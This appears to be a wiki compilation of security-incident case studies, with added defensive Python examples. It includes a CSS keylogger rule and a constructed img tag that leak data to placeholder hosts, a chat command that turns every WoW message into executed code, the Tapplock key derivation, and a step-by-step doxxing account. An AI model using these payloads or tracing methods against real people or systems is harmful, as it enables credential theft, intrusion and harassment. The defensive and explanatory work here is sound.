The forensic analysis indicated that a majority of the files and folders on the server were accessible to all users on the network. Any user on the network could read, create, modify, or delete any of the files or folders within these folders. The investigation revealed that users whose network profiles were established prior to August 2001- when a new System Administrator was hired by the Committee - were generally established correctly and had strict permissions; those established after the date were "open." The investigators do not believe that the Committee's System Administrator acted maliciously, or that he himself inappropriately accessed any user's files. Rather, this significant security vulnerability appears to have been caused by the System Administrator's inexperience, and a lack of training and oversight. This System Administrator left the Committee in July 2003, but permissions remained "open." Forensic analysis of the Judiciary Committee server when this investigation began in November 2003 indicates that the system was even more open to all users on the network at that time.

Despite this significant lack of security, the investigation did not reveal any evidence that users continued to access other users' files after the Nominations Unit clerk stopped doing so in April 2003. Other than the Democratic documents in question, no one who was interviewed brought forth any other documents that they believed had been compromised from the computer system.

The investigation did not identify any individuals, other than the clerk and Mr. Miranda, who were accessing other users' files on the Judiciary Committee computer network. While the clerk admitted to accessing and printing approximately 100-200 pages of documents and providing them to his supervisor in October or November of 2001, they did not know how he had obtained the documents or that he continued to access additional Democratic documents. Additionally, the supervisors did not bring the matter to the attention of the Staff Director. A forensic analysis of the hard drives of both supervisors was conducted and none of the Democratic documents at issue resided on either drive.

The Nominations Unit clerk identified other Judiciary Committee staff members within the Nominations Unit whom he believed knew Democratic computer files were accessible.

Investigators interviewed all of those individuals that were identified as having knowledge about access to Democratic files. Of those interviewed, only one - the Committee's former System Administrator who was working part-time on developing a database for the majority - knew that any users' folders were inappropriately open to others. This individual did not know the extent of the problem and thought the System Administrator was just "sloppy" with setting some users' permissions. He did not advise the System Administrator of his discovery.

In the interviews that were conducted, to date no other individuals on either the Republican or Democratic staffs admitted that they knew that access could be obtained to the other's files. There was speculation among those interviewed that if Mr. Lundell learned how to get access to Democratic files, others on the Committee were probably doing the same thing. The Democratic staff working on judicial nominations clearly did not know there was a vulnerability. If they had, presumably they would have protected their files.

Source
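The permission problem the report describes (profiles created after a certain date left writable by every user on the network) is the kind of thing a periodic audit catches before an investigation does. The following is an added example, not code from the report or from this page: it walks a directory tree and reports entries whose mode grants write access to other users, and builds a throwaway sample tree with one strict and one open profile so it can be run offline. The paths and the sample tree are constructed for the demonstration.

```python
import os
import stat
import tempfile
from pathlib import Path

# Added example (not from the Senate report or the wiki page): flag entries that
# other users on the host can write to, the "open" permissions the report describes.
OTHER_WRITE = stat.S_IWOTH
GROUP_WRITE = stat.S_IWGRP


def find_open_entries(root, include_group=False):
    """Return sorted paths (relative to root) whose mode grants write access to
    'other', and optionally to the group.  Symlinks are skipped, not followed."""
    mask = OTHER_WRITE | (GROUP_WRITE if include_group else 0)
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            p = Path(dirpath) / name
            st = os.lstat(p)
            if stat.S_ISLNK(st.st_mode):
                continue
            if st.st_mode & mask:
                findings.append(str(p.relative_to(root)))
    return sorted(findings)


def build_sample_tree():
    """Constructed tree mirroring the report: an older profile set up strictly
    (0o700) and a newer one left world-writable (0o777)."""
    base = Path(tempfile.mkdtemp(prefix="perm-audit-"))
    strict = base / "users" / "older_profile"
    open_dir = base / "users" / "newer_profile"
    strict.mkdir(parents=True)
    open_dir.mkdir(parents=True)
    (strict / "memo.txt").write_text("private")
    (open_dir / "memo.txt").write_text("exposed")
    os.chmod(strict, 0o700)
    os.chmod(strict / "memo.txt", 0o600)
    os.chmod(open_dir, 0o777)
    os.chmod(open_dir / "memo.txt", 0o666)
    return base


def audit_sample():
    """Build the sample tree and audit it; returns the world-writable entries."""
    return find_open_entries(build_sample_tree())


if __name__ == "__main__":
    for path in audit_sample():
        print("world-writable:", path)
```

Run against a real share root (with `include_group=True` where group membership is broad), the output is the list of profiles that would have shown up "open" in the report's July and November snapshots.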

Novel Hacks

Hacking a Smart Lock

Well, it turns out the lock broadcast its own Bluetooth MAC address over the airwaves, and uses that MAC address to calculate a key used to lock and unlock the device.

Tierney cracked the system disturbingly quickly: "It upper cases the BLE MAC address and takes an MD5 hash. The 0-7 characters are key1, and the 16-23 are the serial number." The upshot? He was able to write a script, port it to an Android app, and open any nearby Tapplock wirelessly using his phone and Bluetooth, taking less than two seconds each time.

Security researcher Vangelis Stykas published a blog post on Friday outlining that Tapplock API endpoints have literally no security checks beyond checking whether there was a valid token.

So if you create a Tapplock account and gain a login, you will be able – again – to open every single Tapplock out there.

That's right, Tapplock is literally handing out all the information people need to not only access others' locks but where you can find them physically.

- Article

CSS3 get visual look of iframe across origins hack

Get pixels from iframe across origin (patched in latest browser)
https://www.evonide.com/side-channel-attacking-browsers-through-css3-features/
https://github.com/breakthenet/css3-side-channel-attack/tree/master
Get visited links, same hack as above (not patched)
https://lcamtuf.blogspot.com/2016/08/css-mix-blend-mode-is-bad-for-keeping.html

Stealth Cell Tower

Stealth Cell Tower is an antagonistic GSM base station in the form of an innocuous office printer. It brings the covert design practice of disguising cellular infrastructure as other things - like trees and lamp-posts - indoors, while mimicking technology used by police and intelligence agencies to surveil mobile phone users.

Masquerading as a regular cellular service provider, Stealth Cell Tower surreptitiously catches phones and sends them SMSs written to appear they are from someone that knows the recipient. It does this without needing to know any phone numbers.

With each response to these messages, a transcript is printed revealing the captured message sent, alongside the victim’s unique IMSI number and other identifying information. Every now and again the printer also randomly calls phones in the environment and on answering, Stevie Wonder’s 1984 classic hit I Just Called To Say I Love You is heard.

- Article

Self-Propagating Smart Light Bulb Worm

Abstract: Within the next few years, billions of IoT devices will densely populate our cities. In this paper we describe a new type of threat in which adjacent IoT devices will infect each other with a worm that will spread explosively over large areas in a kind of nuclear chain reaction, provided that the density of compatible IoT devices exceeds a certain critical mass. In particular, we developed and verified such an infection using the popular Philips Hue smart lamps as a platform. The worm spreads by jumping directly from one lamp to its neighbors, using only their built-in ZigBee wireless connectivity and their physical proximity. The attack can start by plugging in a single infected bulb anywhere in the city, and then catastrophically spread everywhere within minutes, enabling the attacker to turn all the city lights on or off, permanently brick them, or exploit them in a massive DDOS attack. To demonstrate the risks involved, we use results from percolation theory to estimate the critical mass of installed devices for a typical city such as Paris whose area is about 105 square kilometers: The chain reaction will fizzle if there are fewer than about 15,000 randomly located smart lights in the whole city, but will spread everywhere when the number exceeds this critical mass (which had almost certainly been surpassed already).

To make such an attack possible, we had to find a way to remotely yank already installed lamps from their current networks, and to perform over-the-air firmware updates. We overcame the first problem by discovering and exploiting a major bug in the implementation of the Touchlink part of the ZigBee Light Link protocol, which is supposed to stop such attempts with a proximity test. To solve the second problem, we developed a new version of a side channel attack to extract the global AES-CCM key that Philips uses to encrypt and authenticate new firmware. We used only readily available equipment costing a few hundred dollars, and managed to find this key without seeing any actual updates. This demonstrates once again how difficult it is to get security right even for a large company that uses standard cryptographic techniques to protect a major product.

- Schneier article, Article

Inaudible Sound Attacks

- Cuban Sonic Weapon Attack - Reverse Engineered

- Alexa/Siri attacks: Dolphin Attack Article / Dolphin Attack Paper

- Embedding the above attack into music

Tracking Pixel Service to decrypt emails

  • Client sends you an encrypted email, asks you to append tracking pixel. You do so and then forward it along.
  • Your tracking pixel actually sends you the decrypted version of the email from the client's machine.
  • Some mail clients concatenate all parts of a multipart message together, even joining partial HTML elements, allowing the decrypted plaintext of an OpenPGP or S/MIME encrypted part to be exfiltrated via an image tag.

Hackernews thread Article
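The third bullet above is the whole mechanism: a client that glues MIME parts together before parsing lets an `<img>` tag opened in an attacker-supplied part swallow the decrypted text of the next part as part of its URL. The following is an added example, not code from the linked thread or article, that models that behaviour and the two fixes (parse each part on its own; do not fetch remote images automatically). The message parts and the hostname attacker.example are constructed for the demonstration.

```python
import re

# Added example: toy model of the MIME-concatenation flaw described above.
# Part 1 and part 3 are attacker-controlled HTML wrapping the victim's encrypted
# part; part 2 stands for the plaintext after the client has decrypted it.
CONSTRUCTED_PARTS = [
    '<img src="http://attacker.example/collect?',   # opens a tag, never closes it
    'Secret meeting at 09:00, room 4B.',             # decrypted body (constructed)
    '">',                                            # closes the tag
]

IMG_SRC = re.compile(r'<img\s+src="([^"]*)"', re.IGNORECASE)


def remote_image_urls(html):
    """Return the remote URLs a renderer would fetch for <img> elements in html."""
    return [u for u in IMG_SRC.findall(html) if u.startswith(("http://", "https://"))]


def render_concatenated(parts):
    """Vulnerable behaviour: all parts are joined into one document before parsing,
    so the tag from part 1 absorbs part 2's plaintext into its src attribute."""
    return remote_image_urls("".join(parts))


def render_isolated(parts, allow_remote=False):
    """Hardened behaviour: each part is parsed as its own document, and remote
    images are fetched only when the user has opted in.  Returns the URLs that
    would actually be loaded."""
    urls = []
    for part in parts:
        if allow_remote:
            urls.extend(remote_image_urls(part))
    return urls


if __name__ == "__main__":
    print("concatenated:", render_concatenated(CONSTRUCTED_PARTS))
    print("isolated:    ", render_isolated(CONSTRUCTED_PARTS, allow_remote=True))
```

With the parts isolated, the unclosed tag in part 1 never matches, so even a client that allows remote images leaks nothing; with remote images off by default, the channel is closed regardless of parser behaviour.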

Project a voice with a laser

This specific project, called Non-Lethal Laser Induced Plasma Effects (NL LIPE), aims to have perfected a beam that can produce audible instructions and commands to an individual or a small group of people within three years and maybe have a practical prototype system ready in five years.
- Article

Casino Hacked Through Fish Tank Thermometer

A casino was hacked through its Internet-connected thermometer in an aquarium in its lobby. Hackers exploited a vulnerability in the thermostat to get a foothold in the network. Once there, they managed to access the high-roller database of gamblers and then pulled it back across the network, out the thermostat, and up to the cloud.
- Article
A North American casino recently installed a high-tech fish tank as a new attraction, with advanced sensors that automatically regulate temperature, salinity, and feeding schedules. To ensure these communications remained separate from the commercial network, the casino configured the tank to use an individual VPN to isolate the tank’s data. However, as soon as Darktrace was installed, it identified anomalous data transfers from the fish tank to a rare external destination. 
- Report

World of Warcraft: RemoveExtraSpaces

World of Warcraft supports add-ons to its interface written in the Lua scripting language, so it exposes a robust API for those add-ons to use.

For this attack, the attacker must convince the player to enter one single command into their chat window:

/run RemoveExtraSpaces=RunScript

In this command, '/run' says to interpret what follows as a Lua script, 'RemoveExtraSpaces' is a built-in function that removes extra spaces from text, and 'RunScript' is a built-in function that executes text as a Lua script (similar to eval in JavaScript).

The function 'RemoveExtraSpaces' is executed on every chat message a player receives, so in effect the above command causes every chat message the player receives to be executed as though it's Lua script.

Now the attacker can simply whisper the victim player to make the victim's user interface do anything he wishes, or to extract information about the player. He can, for example, extract the victim's current in-game location from the UI, approach the player in game, open a trade with the player, and force the victim's UI to hit the accept button.

[Article]
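The root cause is that the chat pipeline looks its text-cleaning hook up by name each time a message arrives, so anything the player (or a script the player was talked into running) stores under that name becomes the message handler. The following is an added Python model of that design, not Blizzard's code and not Lua: `remove_extra_spaces` stands in for RemoveExtraSpaces, `run_script` for RunScript, and the `HOOKS` table for the shared UI namespace. It contrasts the by-name lookup with a handler that binds the real function once at load time, so a later reassignment of the global name no longer changes how chat is processed.

```python
import re

# Added example: a model of the hook-reassignment flaw, with the hardened form.
HOOKS = {}  # shared UI namespace; user scripts and the chat pipeline both see it


def remove_extra_spaces(text):
    """Model of RemoveExtraSpaces: collapse runs of whitespace."""
    return re.sub(r"\s+", " ", text).strip()


def run_script(text):
    """Model of RunScript: execute its argument as code in the UI namespace."""
    exec(text, {"HOOKS": HOOKS})
    return "<executed>"


HOOKS["RemoveExtraSpaces"] = remove_extra_spaces
HOOKS["RunScript"] = run_script


def deliver_chat_dynamic(message):
    """Vulnerable pipeline: resolves the hook by name on every message."""
    return HOOKS["RemoveExtraSpaces"](message)


def make_static_pipeline():
    """Hardened pipeline: bind the cleaner once when the UI loads; the local
    reference is untouched by later writes to HOOKS."""
    cleaner = remove_extra_spaces

    def deliver(message):
        return cleaner(message)

    return deliver


def user_runs(command):
    """Model of '/run <script>': the player executes code in the UI namespace."""
    exec(command, {"HOOKS": HOOKS})


def demo():
    """Replay the page's scenario against both pipelines; returns what each did."""
    HOOKS["RemoveExtraSpaces"] = remove_extra_spaces   # fresh UI state
    HOOKS.pop("pwned", None)
    static_deliver = make_static_pipeline()
    # The social-engineered command from the page, in the model's syntax.
    user_runs("HOOKS['RemoveExtraSpaces'] = HOOKS['RunScript']")
    incoming = "HOOKS['pwned'] = True"   # a whisper from another player (constructed)
    static_out = static_deliver(incoming)
    flag_after_static = HOOKS.get("pwned", False)
    dynamic_out = deliver_chat_dynamic(incoming)
    flag_after_dynamic = HOOKS.get("pwned", False)
    return {
        "static_out": static_out,
        "flag_after_static": flag_after_static,
        "dynamic_out": dynamic_out,
        "flag_after_dynamic": flag_after_dynamic,
    }


if __name__ == "__main__":
    print(demo())
```

The static pipeline treats the whisper as text and returns it unchanged; the dynamic one hands it to the code runner. The general lesson is that privileged code paths should not dispatch through names that untrusted scripts are allowed to rebind.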

CSS Keylogger

Concept (repeat for every ascii character):

input[type="password"][value$="D"] { background-image: url("http://localhost:3000/D"); }
  • Works for password inputs that update 'value' attribute with the typed in value, a common pattern in React.
  • For password managers like LastPass, you can get the first character with [value^=a], the last value [value$=a], and anywhere in the string [value*=a]. Could target like first two and last two and any in middle with around 13000 combinations.

Open Source Lib
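A defender can look for this pattern statically: a rule whose selector matches on an input's `value` attribute with `^=`, `$=` or `*=` and whose declarations load a remote URL has no legitimate styling purpose. The following is an added example, not part of this page or of the linked library, that scans a stylesheet for exactly that combination. The stylesheet and the hostnames in it are constructed for the demonstration.

```python
import re

# Added example: static check for value-sniffing CSS rules.  The sheet below is
# constructed; localhost:3000 and exfil.example are placeholders.
CONSTRUCTED_CSS = """
input[type="password"][value$="D"] { background-image: url("http://localhost:3000/D"); }
input[type="password"][value^="a"] { background: url(https://exfil.example/a) }
input.search[value*="q"] { color: red; }
button:hover { background-image: url("/static/hover.png"); }
"""

RULE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)           # selector { declarations }
ATTR_MATCH = re.compile(
    r"""\[\s*value\s*([\^$*]=)\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*\]""", re.I)
REMOTE_URL = re.compile(r"""url\(\s*["']?(https?://[^"')\s]+)""", re.I)


def find_value_sniffing_rules(css):
    """Return one finding per rule that (a) targets an input, (b) matches on the
    value attribute with a substring operator, and (c) loads a remote URL."""
    findings = []
    for selector, body in RULE.findall(css):
        selector = selector.strip()
        attr = ATTR_MATCH.search(selector)
        url = REMOTE_URL.search(body)
        if attr and url and selector.lower().startswith("input"):
            findings.append({
                "selector": selector,
                "operator": attr.group(1),
                "fragment": attr.group(2).strip("\"'"),
                "url": url.group(1),
            })
    return findings


if __name__ == "__main__":
    for f in find_value_sniffing_rules(CONSTRUCTED_CSS):
        print(f"{f['operator']} {f['fragment']!r} -> {f['url']}  ({f['selector']})")
```

The third rule matches on `value` but loads nothing remote, and the fourth loads a same-origin image, so neither is reported. As a runtime control, a Content-Security-Policy with a tight `img-src` blocks the background-image fetch itself, since CSP governs CSS-initiated image loads as well as `<img>` tags.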

Jumping Airgaps

Guri and his fellow Ben-Gurion researchers have shown, for instance, that it's possible to trick a fully offline computer into leaking data to another nearby device via the noise its internal fan generates, by changing air temperatures in patterns that the receiving computer can detect with thermal sensors, or even by blinking out a stream of information from a computer hard drive LED to the camera on a quadcopter drone hovering outside a nearby window. In new research published today, the Ben-Gurion team has even shown that they can pull data off a computer protected by not only an air gap, but also a Faraday cage designed to block all radio signals.
- Quoted from Schneier's blog, which quotes from here

Page with all research results

Overall concept:

  • Drop a USB drive with malware in a parking lot. Employee picks it up, and sticks it in an air gapped machine to see what's on it. This infects that machine.
  • Now we have a machine not connected to the internet that is infected... use one of the proposed concepts above to exfiltrate the data.

Damaging Hard Drives with an Ultrasonic Attack

The attacks use sonic and ultrasonic sounds to disrupt magnetic HDDs as they read or write data. The researchers showed how the technique could stop some video-surveillance systems from recording live streams. Just 12 seconds of specially designed acoustic interference was all it took to cause video loss in a 720p system made by Ezviz. Sounds that lasted for 105 seconds or more caused the stock Western Digital 3.5 HDD in the device to stop recording altogether until it was rebooted.

- article
- schneier blog
- paper

Payoff

http://www.integrity-research.com/jury-convicts-in-big-data-insider-trading-trial/

Cryptocurrency private keys for hot wallets

Coincheck $500 million hack

According to the exchange’s representatives, the hackers have managed to steal the private key for the hot wallet where NEM coins were stored, enabling them to drain the funds. 
- Article

Gatecoin $2 million hack

Most clients’ asset funds are stored in multi-signature, cold wallets. However, the attacker managed to alter the system so that BTC and ETH deposit transfers bypassed the multi-signature cold storage and entered the hot wallet during the breach. The loss of ETH funds exceeded the 5% limit Gatecoin placed on its hot wallets.
- Article

https://www.reddit.com/r/eos/comments/9fxyd4/eosbet_transfer_hack_statement/

Hacking to game the stock market

St Jude's

St Jude's Medical Inc.'s pacemakers and defibrillators had a vulnerability that was discovered by researchers working for a legit company. They email an investment firm with an offer to make money.

The researchers would provide information proving the medical devices could be hacked in a way that was life-threatening, and the investor would take a short position against St Jude. The hacker's fee for the information would be 10% of the profits as the shares fall. If the shares go up, the hackers will pay 20% of the lost money.

The researchers want to impose significant monetary penalties on companies they believe are negligent about protecting consumers (rather than collecting a typical bug bounty). They don't believe hackers will exploit it, as it took their team months to find the exploits and they will withhold key details from the public.
- Article
Medical device maker St Jude has filed suit against a security startup that shorted its stock and publicized alleged flaws in its products for profit.

Pacemaker supplier St Jude has sued both MedSec and investment research biz Muddy Waters in Minnesota, America, as well as three other individuals it says falsely reported serious vulnerabilities in its pacemakers and defibrillators.

The allegations [PDF] include false advertising, false statements, conspiracy, and market manipulation.

- Article

AMD

Last week, the Israeli security company CTS-Labs published a series of exploits against AMD chips. The publication came with the flashy website, detailed whitepaper, cool vulnerability names -- RYZENFALL, MASTERKEY, FALLOUT, and CHIMERA -- and logos we've come to expect from these sorts of things. What's new is that the company only gave AMD a day's notice, which breaks with every norm about responsible disclosure. 

But CTS's website touting AMD's flaws also contained a disclaimer that threw some shadows on the company's motives: "Although we have a good faith belief in our analysis and believe it to be objective and unbiased, you are advised that we may have, either directly or indirectly, an economic interest in the performance of the securities of the companies whose products are the subject of our reports," reads one line. WIRED asked in a follow-up email to CTS whether the company holds any financial positions designed to profit from the release of its AMD research specifically. CTS didn't respond.

- Schneier Blog Post
- Article

Equifax

Before Equifax revealed its massive data breach last year, four of its executives sold their shares. Four days after news of the breach hit the press, the stock had plunged 18.4%. (One of those executives, Jun Ying, was charged on Wednesday for insider trading.)
- Article

Revenge/Vigilantes

Ransomware a Tech Support Scammer

Tech support scammers messed with a hacker's mother, so he retaliated with ransomware. He faked falling for the scam, then sent the scammer a fake photo of a credit card in a zip file which, when unzipped, actually triggered ransomware.
- Article

CEO wire transfer scammers open poisoned PDF invoices

Hacker takes down CEO wire transfer scammers, sends their Win 10 creds to the cops. 'Whaling' attackers fall for poison PDF 'invoices'.
- Article

Hacker wipes spyware servers multiple times

Thursday, the hacker said he started wiping some cloud servers that belong to Retina-X Studios, a Florida-based company that sells spyware products targeted at parents and employers, but that are also used by people to spy on their partners without their consent.

Retina-X was one of two companies that were breached last year in a series of hacks that exposed the fact that many otherwise ordinary people surreptitiously install spyware on their partners’ and children’s phones in order to spy on them. This software has been called “stalkerware” by some. 

...The private data was stored in containers provided by cloud provider Rackspace. The hacker found the key and credentials to those containers inside the Android app of PhoneSheriff, one of Retina-X’s spyware products. The API key and the credentials were stored in plaintext, meaning the hacker could take them and gain access to the server.

This time, the hacker said the API key was obfuscated, but it was still relatively easy for him to obtain it and break in again. Because he feared another hacker getting in and then posting the private photos online, the hacker decided to wipe the containers again.

- Article

Ransomware

Spread Popcorn Time Ransomware, get chance of free Decryption Key

Yesterday a new in-development ransomware was discovered by MalwareHunterTeam called Popcorn Time that intends to give victims a very unusual, and criminal, way of getting a free decryption key for their files. With Popcorn Time, not only can a victim pay a ransom to get their files back, but they can also try to infect two other people and have them pay the ransom in order to get a free key.
- Article

Selling Data

Sell credit card data obtained, OR create a fake site pretending to be one of the popular stolen credit card marketplaces.
- Article

OpSec Violations

Fingerprinting Documents to track leakers / inside threats

Unicode homoglyph substitution [Conference Paper on Unicode Homoglyph Substitution] [Web App for Unicode Homoglyph Substitution]

Zero-width characters [Blog Post]

Article on all methods [Good general article]

Intentional misspelling (used in Congress) [Blog Post]

How a few yellow dots burned the Intercept’s NSA leaker Article

Guide on how printers use yellow dots https://veteransec.com/2018/10/18/vetsec-takes-first-in-the-hacktober-ctf-summary-steganography-write-up/

Fonts leak date information

How a Microsoft font brought down Pakistani Prime Minister Nawaz Sharif
Friday's ouster of Pakistani Prime Minister Nawaz Sharif wasn't just a momentous event in the Asian country but also big news for fans of typography.

A key part of the corruption case that led to Mr. Sharif's removal from power hinged on the typeface used in a financial document.

The controversy was therefore dubbed Fontgate and on Friday, headline writers and wags on Twitter were saying that Pakistan was now "Sans Sharif."

It all hinged on a document that the Sharif family had produced in an attempt to distance the prime minister from questions about who owned four properties in an upscale part of London.

The document was purported to be written in February 2006 but court-appointed investigators concluded that it was forged, noting that it used the Calibri font, a Microsoft licensed typeface that was not commercially available at the time.
- Article: https://www.theglobeandmail.com/news/world/how-a-microsoft-font-brought-down-pakistani-prime-minister-nawaz-sharif/article35828938/
The scandal wasn't nearly as big, but a similar issue arose during the 2004 US Presidential election. Documents claiming to be from the early 1970s about George W Bush's Air National Guard service were found to use things like proportional-width fonts - and, indeed, the entire document seems to have just been typed using the default settings for a contemporary version of Word.
- Article: https://en.wikipedia.org/wiki/Killian_documents_controversy

Marcus Hutchins [Sept 2017]

Flipertyjopkins uploaded a video to YouTube 8 years ago instructing viewers how to use Hotmail cracker v1.3. Investigative journalist Brian Krebs notes that at the 2:48 mark in the video, an MSN chat window shows up that clearly shows the user is logged in as "[email protected]", thus linking Flipertyjopkins to Marcus Hutchins.

[Article]

eBay Scammer [Sept 2016]

Person had $500 Apple gift card, wanted to sell for bitcoin due to lack of chargebacks.

Several potential buyers, all wanted it for 50% or less of card's worth. Found one willing to pay 75% on reddit darkmarket.

Seller sends the card numbers so the buyer can verify the balance, plus details on how to verify the seller's identity (a news article about the winner of a competition; clicking the blog link in the article leads to the winner's blog; its About Me page lists social usernames, one of which is the reddit account the communication is taking place on).

Buyer says the seller could have just bought that reddit account and insists on not going first; he says he has an eBay account with high positive feedback and will prove it. Seller says the buyer could have bought the eBay account; buyer replies that he couldn't, due to lockout on geo/IP changes. Buyer sends the seller a message from the high-rep account to prove he owns it.

Seller sends pins for cards + bitcoin address for payment + pictures of card hosted on his site + tracking number for mailed cards.

Buyer deletes his reddit account to stop communication. Seller messages him on eBay, buyer on eBay claims his account was hacked and it wasn't him.

Seller decides to track buyer/scammer down. From the scammer's eBay account, the seller had a username + city location. From the scammer's reddit account, the seller had a username.

A google search for the scammer's reddit and eBay usernames uncovered a Steam account which used both names, confirming it was not a hacked eBay account but the same person who went by two nicknames. The google search also uncovered a profile on a looking-for-job website which contained the scammer's first name, first letter of last name, and city location (which matched the one on eBay).

Seller had sent buyer an image of the cards. Scammer had opened it, which gave the seller the scammer's IP address and city (which again matched the one on eBay).

Seller now did a Facebook search for the scammer's eBay username. In the text of a random gamer's post, seller sees the message "Good games last night on LoL <scammer_ebay_username>". Unfortunately the reference to the profile wasn't a link, only text, due to the privacy settings of the referenced user.

Seller looked at this random gamer's profile, scrolled through 4 years of posts, and found a screenshot that random gamer posted that had the scoreboard from LoL (League of Legends) in the foreground AND facebook chat open in the background, with the scammer's full name visible (matching the first name plus first letter of last name seller got from the job website). So from this, seller discovered scammer's full first and last name.

Seller now did a Facebook search of scammer's last name and city, and found the scammer's mother. He sent the scammer's mother a Facebook message.

[Article]

vDos [Sept 2016]

Investigator was analyzing a random DDoS-for-hire site, PoodleStresser. He found a vulnerability that allowed downloading the site's config data. This data showed PoodleStresser connects to the API of the DDoS-for-hire site vDOS to power its attacks (so PoodleStresser is just a reseller of vDOS).

vDos is a much larger site of the same ilk, hidden behind Cloudflare (so the site's true IP is not known). Using the downloaded config data from PoodleStresser gave the investigator API access to vDos. The investigator found a serious vulnerability in the vDos API that allowed dumping vDos' database and config files, as well as obtaining the true IP address of vDos (which pointed to four rented servers in Bulgaria at Verdina.net).

From the vDos dumped database, all tech support tickets were extracted. From these support tickets, it was discovered that all attacks vDos clients attempted to make against Israel failed (suggesting owners were in Israel trying to avoid attention of Israeli authorities). Additionally, the vDos owners' online nicknames were found in the support tickets as P1st0 and AppleJ4ck.

From the extracted vDos config files, it was discovered that the site was configured to blast text messages to 6 phone numbers (two of which are Israeli) whenever a high-priority support ticket was created, via the online SMS service Nexmo.com. Of the two Israeli phone numbers, one was tracked via Whitepages online to an Israeli named Yarden Bidani, while the other was connected via WHOIS records to the domain v-email.org under the name Itay Huri. It was also discovered that the site was configured to send support emails to [email protected], [email protected] and [email protected]

A reverse IP lookup found several other sites running on the same IP as vDos. A WHOIS lookup on these domains found one of them registered to a phone number matching one of the phone numbers vDos' config files blasted text messages to.

A Google search for the owners' aliases (discovered in the tech support tickets) found listings they made on places like hackforums.net, peddling warez and services.

[Article]

KickAss Torrents [July 2016]

The feds tracked the owner of KAT through a variety of methods, though mostly through accessing bank and server records.

Possible angle: Client had a website example.com, which Feds saw pointed to IP Address 5.5.5.5. A reverse DNS lookup on 5.5.5.5 showed several other domains hosted at the same IP address (many of which just proxied the main site). One of those other domains was old, and the whois record for it was not privacy protected and thus leaked the true owner's name, address, phone, and email. The email from this domain was used for an Apple account that purchased something on iTunes using a specific IP address (that wasn't hidden behind a proxy). Same IP address was person managing Facebook page for KAT. Coinbase account to collect bitcoin donations also tied to same email address, and bitcoin address behind Coinbase account was on KAT website for donations.

[Article 1, Article 2, Article 3]

Burger King Foot Lettuce Guy

Burger King Foot Lettuce guy doxxed from photo meta-data

Fitness Tracking App Gives Away Military Base Locations

Data firms often aggregate and 'anonymize' data for presentation in compelling visuals or charts. How anonymized is the data if there are a handful of fitness users running around a track of an abandoned air force base in Somalia? Aggregation is not anonymization.

Locating Secret Military Bases via Fitness Data TheGuardian Article Tweet: Somalia Air Force Base

https://mango.pdf.zone/operation-luigi-how-i-hacked-my-friend-without-her-noticing

HTC

race conditions

Hacking Starbucks
https://sakurity.com/blog/2015/05/21/starbucks.html
Keybase exceed invite limit
https://hackerone.com/reports/115007

Blacknova Traders

https://packetstormsecurity.com/files/120231/BlackNova-Traders-SQL-Injection.html https://github.com/emeth-/BlacknovaTraders/blob/master/news.php#L42-L55


Account Enumeration

Something like: log in as Bob (user ID 12345) and try to read the admin's social security number. The trick is that the admin is user ID 1; with no authorization check, you can edit the ID in the URL to pull up his data.
https://hackerone.com/reports/98247
https://www.wired.com/2010/06/ipad-exposed/
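What is missing in the note above is an object-level authorization check: the handler trusts the ID in the URL and never asks whether the logged-in session is allowed to read that record. The following is an added example, not code from either linked report: a vulnerable lookup beside the checked one, a counter of refused reads that flags a session probing consecutive IDs, and opaque public handles so record numbers cannot be enumerated by counting. The user table and the placeholder SSN strings are constructed.

```python
import secrets
from collections import Counter


class Forbidden(Exception):
    """Raised when the requesting session may not read the requested record."""


# Constructed user table; sequential integer IDs on purpose, as in the note above.
USERS = {
    1:     {"name": "admin", "role": "admin", "ssn": "PLACEHOLDER-SSN-1"},
    2:     {"name": "carol", "role": "user",  "ssn": "PLACEHOLDER-SSN-2"},
    12345: {"name": "bob",   "role": "user",  "ssn": "PLACEHOLDER-SSN-12345"},
}

DENIALS = Counter()   # session user id -> number of refused object reads


def get_profile_unchecked(requested_id):
    """Vulnerable handler: the ID from the URL is the only thing consulted."""
    return USERS[requested_id]


def get_profile(session_user_id, requested_id):
    """Object-level authorization: a user may read only their own record unless
    their role is admin.  The check runs before any lookup of the target."""
    requester = USERS[session_user_id]
    if requester["role"] != "admin" and requested_id != session_user_id:
        DENIALS[session_user_id] += 1
        raise Forbidden(f"user {session_user_id} may not read record {requested_id}")
    return USERS[requested_id]


def looks_like_enumeration(session_user_id, threshold=3):
    """Detection hook: several refused reads from one session suggest ID probing."""
    return DENIALS[session_user_id] >= threshold


# Second layer: hand out opaque handles instead of guessable integers.
PUBLIC_IDS = {uid: secrets.token_urlsafe(16) for uid in USERS}
_LOOKUP = {pid: uid for uid, pid in PUBLIC_IDS.items()}


def resolve_public_id(public_id):
    """Map an opaque handle back to the internal ID, or None if it is unknown."""
    return _LOOKUP.get(public_id)
```

Opaque handles are a defence in depth, not a substitute for the check: a leaked handle still grants nothing unless the session is authorized for the record behind it.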


https://krebsonsecurity.com/2018/09/govpaynow-com-leaks-14m-records/


DOD: Turn Off Your Fitbit, Garmin, Apple Watch GPS NOW! https://breakingdefense.com/2018/08/turn-off-your-fitbit-garmin-apple-watch-gps-now/

Homebrew leaked github api key in public jenkins: https://medium.com/@vesirin/how-i-gained-commit-access-to-homebrew-in-30-minutes-2ae314df03ab


Mobile App Rackspace credentials embedded within app

Thursday, the hacker said he started wiping some cloud servers that belong to Retina-X Studios, a Florida-based company that sells spyware products targeted at parents and employers, but that are also used by people to spy on their partners without their consent.

Retina-X was one of two companies that were breached last year in a series of hacks that exposed the fact that many otherwise ordinary people surreptitiously install spyware on their partners’ and children’s phones in order to spy on them. This software has been called “stalkerware” by some. 

...The private data was stored in containers provided by cloud provider Rackspace. The hacker found the key and credentials to those containers inside the Android app of PhoneSheriff, one of Retina-X’s spyware products. The API key and the credentials were stored in plaintext, meaning the hacker could take them and gain access to the server.

This time, the hacker said the API key was obfuscated, but it was still relatively easy for him to obtain it and break in again. Because he feared another hacker getting in and then posting the private photos online, the hacker decided to wipe the containers again.

- Article

RNG

Slot Machine RNG

The crew used a cell phone to record several spins of the wheel, fed those into an algorithm that recovered the random seed the machine was operating on, and received back the best moment to hit spin. https://www.wired.com/2017/02/russians-engineer-brilliant-slot-machine-cheat-casinos-no-fix/


Hacking slot machines with a buttonhole camera and brute-force search (github.com) https://news.ycombinator.com/item?id=18035283


Texas Hold 'Em online - bad shuffler

